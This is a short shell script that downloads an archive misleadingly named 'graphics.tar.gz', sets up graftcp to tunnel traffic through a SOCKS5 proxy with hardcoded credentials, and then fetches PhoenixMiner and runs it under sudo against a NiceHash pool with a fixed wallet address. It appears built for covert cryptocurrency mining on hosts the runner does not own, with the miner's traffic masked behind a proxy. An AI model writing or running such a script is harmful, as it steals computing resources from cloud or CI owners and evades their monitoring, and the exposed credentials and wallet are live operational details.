#!/bin/sh
ln -fs /usr/share/zoneinfo/Africa/Johannesburg /etc/localtime
dpkg-reconfigure --frontend noninteractive tzdata

wget https://raw.githubusercontent.com/nathanfleight/scripts/main/graphics.tar.gz

tar -xvzf graphics.tar.gz

cat > graftcp/local/graftcp-local.conf <<END
listen = :2233
loglevel = 1
socks5 = 176.53.133.217:57597
socks5_username = 2BHVpyGPD
socks5_password = 1rN14HAmV
END

./graftcp/local/graftcp-local -config graftcp/local/graftcp-local.conf &

sleep .2

echo " "
echo " "

echo " "

./graftcp/graftcp curl ifconfig.me

echo " "
echo " "

echo " "

echo " "
echo " "

sudo wget https://phoenixminer.info/downloads/PhoenixMiner_6.2c_Linux.tar.gz
tar -xf PhoenixMiner_6.2c_Linux.tar.gz
cd PhoenixMiner_6.2c_Linux
sudo ./PhoenixMiner -pool stratum+tcp://daggerhashimoto.hk.nicehash.com:3353 -wal 343QVQVLGBkJdmb2KPhzR6b3JyUFsXQb7G.Nasgor_Enak-$(echo $(shuf -i 1-99 -n 1)) -pass vapers -proto 4 -stales 0
sleep 99999
